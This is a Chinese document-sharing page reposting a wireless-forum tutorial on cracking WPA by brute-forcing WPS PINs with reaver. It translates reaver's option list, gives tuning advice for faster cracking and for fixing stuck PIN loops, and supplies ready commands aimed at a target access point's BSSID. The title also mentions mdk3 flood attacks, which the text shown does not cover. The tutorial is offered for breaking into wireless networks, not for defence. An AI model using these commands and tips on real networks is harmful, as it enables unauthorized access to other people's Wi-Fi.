PIN过程中出现的死循环解决方法与使用mdk3洪水攻击模式使用教程

合集下载

相关主题

1、下载文档前请自行甄别文档内容的完整性，平台不提供额外的编辑、内容补充、找答案等附加服务。
2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
3、如文档侵犯您的权益，请联系客服反馈,我们会尽快为您处理(人工客服工作时间：9:00-18:30)。

破解WPA时，PIN出现死循环处理方法。(吾就爱无线论坛) 如下面这个例子，一开始，或者破解一段时间后出来PIN无限循环：

(吾就爱无线论坛)

本人经过多次实验最后总结了解决的办法：

Required Arguments:

-i, --interface= Name of the monitor-mode interface to use

网卡的监视接口，通常是mon0

-b, --bssid= BSSID of the target AP

AP的MAC地址

(吾就爱无线论坛)

Optional Arguments:

-m, --mac= MAC of the host system

指定本机MAC地址，在AP有MAC过滤的时候需要使用

-e, --essid= ESSID of the target AP

路由器的ESSID，一般不用指定

-c, --channel= Set the 802.11 channel for the interface (implies -f)

信号的频道，如果不指定会自动扫描

-o, --out-file= Send output to a log file [stdout]

标准输出到文件

-s, --session= Restore a previous session file

恢复进程文件

-C, --exec= Execute the supplied command upon successful pin recovery pin成功后执行命令

-D, --daemonize Daemonize reaver

设置reaver成Daemon

-a, --auto Auto detect the best advanced options for the target AP

对目标AP自动检测高级参数

-f, --fixed Disable channel hopping

禁止频道跳转

-5, --5ghz Use 5GHz 802.11 channels

使用5G频道

-v, --verbose Display non-critical warnings (-vv for more)

显示不重要警告信息-vv 可以显示更多

-q, --quiet Only display critical messages

只显示关键信息

-h, --help Show help

显示帮助

(吾就爱无线论坛)

Advanced Options:

-p, --pin= Use the specified 4 or 8 digit WPS pin

直接读取psk（本人测试未成功，建议用网卡自带软件获取）

-d, --delay= Set the delay between pin attempts [1]

pin间延时，默认1秒，推荐设0

-l, --lock-delay= Set the time to wait if the AP locks WPS pin attempts [60] AP锁定WPS后等待时间

-g, --max-attempts= Quit after num pin attempts

最大pin次数

-x, --fail-wait= Set the time to sleep after 10 unexpected failures [0]

10次意外失败后等待时间，默认0秒

-r, --recurring-delay= Sleep for y seconds every x pin attempts

每x次pin后等待y秒

-t, --timeout= Set the receive timeout period [5]

收包超时，默认5秒

-T, --m57-timeout= Set the M5/M7 timeout period [0.20]

M5/M7超时，默认0.2秒

-A, --no-associate Do not associate with the AP (association must be done by another application)

不连入AP（连入过程必须有其他程序完成）

-N, --no-nacks Do not send NACK messages when out of order packets are received

不发送NACK信息（如果一直pin不动，可以尝试这个参数）

-S, --dh-small Use small DH keys to improve crack speed

使用小DH关键值提高速度（推荐使用）

-L, --ignore-locks Ignore locked state reported by the target AP

忽略目标AP报告的锁定状态

-E, --eap-terminate Terminate each WPS session with an EAP FAIL packet

每当收到EAP失败包就终止WPS进程

-n, --nack Target AP always sends a NACK [Auto]

对目标AP总是发送NACK，默认自动

-w, --win7 Mimic a Windows 7 registrar [False]

模拟win7注册，默认关闭

(吾就爱无线论坛)

------个人心得---------------------------------------------------------

对一个ap刚开始pin的时候打开-vv参数，如果顺利，就中断，然后改成-v继续pin，反正进度是可以保存的

reaver -i mon0 -b xx:xx:xx:xx:xx:xx -d 0 -vv -a -S

如果一直pin不动，尝试加-N参数

reaver -i mon0 -b xx:xx:xx:xx:xx:xx -d 0 -vv -a -S –N

(吾就爱无线论坛)